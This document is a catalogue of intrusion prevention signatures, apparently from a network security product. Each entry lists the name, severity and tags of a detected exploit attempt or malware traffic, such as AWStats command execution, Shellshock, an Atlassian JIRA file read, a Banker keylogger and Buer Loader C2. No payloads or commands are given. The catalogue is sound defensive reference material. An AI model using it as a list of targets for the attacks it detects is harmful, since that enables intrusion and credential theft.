First detected in: sgpkg-ips-1711-5242
Last changed: sgpkg-ips-1711-5242
Vulnerability: Artica-Proxy-Images.listener.php-Arbitrary-File-Read
Description:
Back to top

HTTP_CSU-Artica-Proxy-Wiz.wizard.progress.php-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Artica Tech Artica Proxy detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Artica Tech Artica Proxy, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1711-5242
Last changed: sgpkg-ips-1711-5242
Vulnerability: Artica-Proxy-Wiz.wizard.progress.php-Insecure-Deserialization
Description:
Back to top

HTTP_CSU-ASP.NET-Information-Disclosure-Vulnerability-CVE-2015-1648

About this situation: An attempt to exploit a vulnerability in ASP.NET detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft ASP.NET, MS2015-04, CVE2015, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-638-5211
Last changed: sgpkg-ips-638-5211
Vulnerability: ASP.NET-Information-Disclosure-Vulnerability
Description:
Back to top

HTTP_CSU-Asus-RT-N56U-Remote-Password-Disclosure

About this situation: Asus-RT-N56U fw remote password disclosure vulnerability
Context: HTTP Request URI
Severity: 7
Tags: Windows, Linux, Any Hardware, ASUS RT, Windows not specific, Linux not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-627-5211
Vulnerability: Asus-RT-N56U-Remote-Password-Disclosure
Description:
Back to top

HTTP_CSU-Atlassian-Confluence-Server-S-Endpoint-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Atlassian Confluence Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Confluence, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1397-5242
Last changed: sgpkg-ips-1397-5242
Vulnerability: Atlassian-Confluence-Server-S-Endpoint-Information-Disclosure
Description:
Back to top

HTTP_CSU-Atlassian-Fisheye-And-Crucible-Mostactivecommitters-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Atlassian Crucible detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Atlassian Crucible, Atlassian FishEye, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1000-5242
Vulnerability: Atlassian-Fisheye-And-Crucible-Mostactivecommitters-Information-Disclosure
Description:
Back to top

HTTP_CSU-Atlassian-JIRA-Server-And-Data-Center-Limited-File-Read-CVE-2021-26086

About this situation: An attempt to exploit a vulnerability in Atlassian JIRA detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Atlassian JIRA, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Vulnerability: Atlassian-JIRA-Server-And-Data-Center-Limited-File-Read-CVE-2021-26086
Description:
Back to top

HTTP_CSU-Atlassian-JIRA-Server-And-Data-Center-Planurl-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Atlassian JIRA detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Atlassian JIRA, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1498-5242
Last changed: sgpkg-ips-1498-5242
Vulnerability: Atlassian-JIRA-Server-And-Data-Center-Planurl-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Atlassian-JIRA-Server-And-Data-Center-Viewuserhover.jspa-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Atlassian JIRA detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Atlassian JIRA, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1300-5242
Last changed: sgpkg-ips-1300-5242
Vulnerability: Atlassian-JIRA-Server-And-Data-Center-Viewuserhover.jspa-Information-Disclosure
Description:
Back to top

HTTP_CSU-Autodesk-Autocad-Request-To-Acad.FAS

About this situation: A request to acad.fas detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Autodesk AutoCAD, CVE2014, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Autodesk-Autocad-Insecure-FAS-Loading
Description:
Back to top

HTTP_CSU-Autodesk-Autocad-Request-To-Acdimres.dll

About this situation: A request to acad.fas detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Autodesk AutoCAD, CVE2014, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-999-5242
Vulnerability: Autodesk-Autocad-Insecure-Library-Loading
Description:
Back to top

HTTP_CSU-Autodesk-Autocad-Request-To-DWG-File

About this situation: A request to a DWG file detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Autodesk AutoCAD, CVE2014, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Autodesk-Autocad-Insecure-FAS-Loading
Description:
Back to top

HTTP_CSU-Automattic-Woocommerce-Blocks-Wordpress-Plugin-Store-API-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Automattic WooCommerce Blocks feature plugin detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Automattic WooCommerce, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Vulnerability: Automattic-Woocommerce-Blocks-Wordpress-Plugin-Store-API-SQL-Injection
Description:
Back to top

HTTP_CSU-Avtech-IP-Camera-Cgi-Bin-Nobody-Access

About this situation: A possible attempt to exploit a vulnerability in multiple versions of the AVTECH IP camera firmware
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, AVTECH IP camera, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1772-5242
Vulnerability: Avtech-IP-Camera-Cgi-Bin-Nobody-Access
Description:
Back to top

HTTP_CSU-Awstats-Config-Parameter-Command-Execution

About this situation: AWStats arbitrary command execution
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, AWStats, CVE2005, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-Awstats-Config-Parameter-Command-Execution
Description:
Back to top

HTTP_CSU-Awstats-Configdir-Parameter-System-Compromise

About this situation: AWStats arbitrary command execution
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, AWStats, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-681-5211
Vulnerability: HTTP-Awstats-Configdir-Parameter-System-Compromise
Description:
Back to top

HTTP_CSU-Awstats-Logfile-Parameter-Command-Execution

About this situation: AWStats arbitrary command execution
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, AWStats, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Awstats-Logfile-Parameter-Command-Execution
Description:
Back to top

HTTP_CSU-Awstats-Migrate-Remote-Command-Execution

About this situation: Awstats-Migrate Remote Command Execution 6.4 and 6.5
Context: HTTP Request URI
Severity: 7
Tags: Linux, Any Hardware, AWStats, CVE2006, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-645-5211
Vulnerability: Awstats-Migrate-Remote-Command-Execution
Description:
Back to top

HTTP_CSU-Awstats-Plugin-Arbitrary-Command-Execution

About this situation: AWStats command execution vulnerability
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, AWStats, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Awstats-Plugin-Arbitrary-Command-Execution
Description:
Back to top

HTTP_CSU-Awstats-Rawplugin-Log-Disclosure

About this situation: AWStats web log disclosure
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, AWStats, CVE2005, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-343-4219
Vulnerability: HTTP-Awstats-Rawplugin-Log-Disclosure
Description:
Back to top

HTTP_CSU-Awstats-Totals-Remote-Code-Execution

About this situation: An attempt to exploit an Awstats Totals Remote Code Execution vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, AWStats, CVE2008, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-1344-5242
Vulnerability: Awstats-Totals-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-BadBlue-Mfcisapicommand-Buffer-Overflow

About this situation: Buffer overflow exploit against mfcisapicommand parameter in BadBlue
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, BadBlue, CVE2005, CVE2007, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-1405-5242
Vulnerability: HTTP-BadBlue-Mfcisapicommand-Buffer-Overflow
HTTP-BadBlue-PassThru-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Banker-Keylogger

About this situation: Possible Banker keylogger traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Banker, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Description:
Back to top

HTTP_CSU-Bargain-Buddy-Traffic

About this situation: Bargain Buddy traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Bargain Buddy, Windows not specific, Bargain Buddy not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Bargain-Buddy
Description:
Back to top

HTTP_CSU-Barracuda-Spam-Firewall-Img-Pl-Compromise

About this situation: Detects Barracuda Spam Firewall img.pl exploits
Context: HTTP Request URI
Severity: 7
Tags: Other, Any Hardware, Barracuda Spam Firewall, CVE2005, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-488-5211
Vulnerability: HTTP-Barracuda-Spam-Firewall-Img-Pl-Compromise
Description:
Back to top

HTTP_CSU-Bash-Shellshock-Code-Injection

About this situation: An attempt to exploit a vulnerability in Bourne Again Shell (bash)
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, bash, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1010-5242
Vulnerability: Bash-Shellshock-Code-Injection
Description:
Back to top

HTTP_CSU-Bazar-Backdoor-Malware-Infection-Traffic

About this situation: Bazar Backdoor malware infection traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1314-5242
Last changed: sgpkg-ips-1330-5242
Vulnerability: Bazar-Loader-Backdoor-Malware-Infection-Traffic
Description:
Back to top

HTTP_CSU-BBShop-Remote-File-Inclusion

About this situation: Detected an attempt to exploit a remote file inclusion vulnerability in BBShop
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, BBShop, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-227-3038
Vulnerability: BBShop-Remote-File-Inclusion
Description:
Back to top

HTTP_CSU-Bea-WebLogic-Admin-Console-Cross-Site-Scripting

About this situation: Detects cross site scripting exploits against Bea WebLogic
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, BEA WebLogic, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: HTTP-Bea-WebLogic-Admin-Console-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Bea-WebLogic-XSS

About this situation: Attempt to exploit XSS vulnerability in Oracle Bea WebLogic
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle BEA WebLogic, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-420-4219
Vulnerability: Oracle-Bea-WebLogic-10-XSS
Description:
Back to top

HTTP_CSU-Beacon-Remote-File-Inclusion

About this situation: Detected an attempt to exploit a remote file inclusion vulnerability in Beacon
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Beacon, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-196-2032
Vulnerability: Beacon-Remote-File-Inclusion
Description:
Back to top

HTTP_CSU-Beck-Gmbh-IPC@CHIP-Conf-File-Discosure

About this situation: Beck Gmbh IPC@CHIP allows php.ini file (containing passwords) reading in unauth manner.
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Beck GmbH IPC@CHIP, CVE2001, Windows not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Vulnerability: Beck-Gmdg-IPC@CHIP-Configuration-File-Disclosure
Beck-Gmbh-IPC@CHIP-Conf-File-Discosure
Description:
Back to top

HTTP_CSU-Beck-Gmbh-IPC@CHIP-Denial-of-Service

About this situation: Beck Gmbh IPC@CHIP Denial of Service.
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Beck GmbH IPC@CHIP, Windows not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Vulnerability: Beck-Gmbh-IPC@CHIP-Denial-of-Service
Description:
Back to top

HTTP_CSU-Belkin-Wemo-UPnP-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Belkin Wemo detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Belkin Wemo, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1202-5242
Vulnerability: Belkin-Wemo-UPnP-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-Bifrose.IQ-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Win32.Backdoor.Bifrose.IQ-Botnet
Description:
Back to top

HTTP_CSU-Bitcoin-Bot-Traffic

About this situation: Possible Bitcoin bot traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Bitcoin, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Bitcoin-Bot
Description:
Back to top

HTTP_CSU-Bmc-TrackIt-Password-Reset

About this situation: An attempt to exploit a BMC TrackIt Password Reset vulnerability detected.
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, BMC TrackIt, CVE2014, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-763-5211
Last changed: sgpkg-ips-763-5211
Vulnerability: Bmc-TrackIt-Password-Reset
Description:
Back to top

HTTP_CSU-Boa-Web-Server-Arbitrary-File-Read-CVE-2017-9833

About this situation: An attempt to exploit a vulnerability in Boa Web Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Boa Web Server, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1536-5242
Last changed: sgpkg-ips-1639-5242
Vulnerability: Boa-Web-Server-Arbitrary-File-Read-CVE-2017-9833
Description:
Back to top

HTTP_CSU-Bobax-Activity

About this situation: Bobax activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Bobax
Description:
Back to top

HTTP_CSU-Bookedspace

About this situation: BookedSpace activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, BookedSpace, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Bookedspace
Description:
Back to top

HTTP_CSU-Bredolab-Bot-Activity

About this situation: Bredolab bot activity detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Bredolab-Bot
Description:
Back to top

HTTP_CSU-Buer-Loader-C2-Traffic

About this situation: Buer Loader C2 Traffic was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1211-5242
Last changed: sgpkg-ips-1211-5242
Vulnerability: Buer-Loader-C2-Traffic
Description:
Back to top

HTTP_CSU-Bugzilla-Globals-File-Disclosure

About this situation: Bugzilla configuration file access
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Bugzilla, CVE2001, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-Bugzilla-Globals-File-Disclosure
Description:
Back to top

HTTP_CSU-CA-Erwin-Web-Portal-Profileiconservlet-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in CA Erwin Web Portal detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, CA Erwin Web Portal, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: CA-Erwin-Web-Portal-Profileiconservlet-Information-Disclosure
Description:
Back to top

HTTP_CSU-Cacti-Group-Cacti-Graph_view.php-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Cacti Group Cacti detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1635-5242
Last changed: sgpkg-ips-1646-5242
Vulnerability: Cacti-Group-Cacti-Graph_view.php-SQL-Injection
Description:
Back to top

HTTP_CSU-Campo-Downloader-Malware-Infection-Traffic

About this situation: Downloader malware infection traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1310-5242
Last changed: sgpkg-ips-1324-5242
Vulnerability: Campo-Downloader-Malware-Infection-Traffic
Description:
Back to top

HTTP_CSU-Carberp-Botnet-Traffic-Detected

About this situation: Carberp Botnet traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Carberp, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Carberp-Botnet
Description:
Back to top

HTTP_CSU-Carel-PlantVisor-Pro-Hardcoded-Credentials-Vulnerability

About this situation: An attempt to exploit a vulnerability in Carel PlantVisor detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Carel PlantVisor Pro, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: Carel-PlantVisor-Pro-Hardcoded-Credentials-Vulnerability
Description:
Back to top

HTTP_CSU-Carel-PlantVisor-Pro-Local-File-Inclusion-Vulnerability

About this situation: An attempt to exploit a vulnerability in Carel PlantVisor detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Carel PlantVisor Pro, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: Carel-PlantVisor-Pro-Local-File-Inclusion-Vulnerability
Description:
Back to top

HTTP_CSU-Carlo-Gavazzi-PowerSoft-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Carlo Gavazzi PowerSoft detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Carlo Gavazzi PowerSoft, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Carlo-Gavazzi-PowerSoft-Directory-Traversal
Description:
Back to top

HTTP_CSU-Certec-atvise-webMI2ADS-Denial-Of-Service

About this situation: An attempt to exploit a Certec atvise webMI2ADS detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Certec Atvise, CVE2011, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1258-5242
Vulnerability: Certec-atvise-webMI2ADS-Denial-Of-Service
Description:
Back to top

HTTP_CSU-Cgi-Bigconf-Access

About this situation: Access of 'bigconf.cgi' script in F5 BigIP
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, F5 Networks BIG-IP, CVE1999, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-Bigconf-File-Disclosure
Description:
Back to top

HTTP_CSU-Cgi-Bin-Command-Injection

About this situation: An attempt to exploit a cgi-bin command injection vulnerability detected
Context: HTTP Request URI
Severity: 7
Tags: Linux, Any Hardware, NetGear, CVE2016, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-980-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: NetGear-R7000-And-R6400-Cgi-Bin-Command-Injection
Description:
Back to top

HTTP_CSU-Cgi-Nortel-Contivity-cgiproc-DoS

About this situation: Vulnerable cgiproc script requested
Context: HTTP Request URI
Severity: 2
Tags: Other, Any Hardware, Apache, NCSA HTTPd, CVE2000, Apache not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Cgi-Nortel-Contivity-cgiproc-DoS
Description:
Back to top

HTTP_CSU-CGIScript-csChatRBox-System-Compromise

About this situation: CGIScript csChatRBox
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, CGIScript.net csChatRBox, CVE2002, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-CGIScript.net-csChatRBox.cgi-Eval-Perl-Code-Execution
Description:
Back to top

HTTP_CSU-CGIScript-csGuestbook-System-Compromise

About this situation: CGIScript csGuestbook
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, CGIScript.net csGuestbook, CVE2002, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-CGIScript.net-csGuestbook-Eval-Perl-Code-Execution
Description:
Back to top

HTTP_CSU-CGIScript-csLiveSupport-System-Compromise

About this situation: CGIScript csLiveSupport
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, CGIScript.net csLiveSupport, CVE2002, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-CGIScript.net-csLiveSupport.cgi-Eval-Perl-Code-Execution
Description:
Back to top

HTTP_CSU-CGIScript-csNews-Database-Information-Disclosure

About this situation: Vulnerable csNews.cgi script requested
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, CGIScript.net csNews, CVE2002, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-16-1210
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-CGIScript_Net_csNews_Database_Information_Disclosure
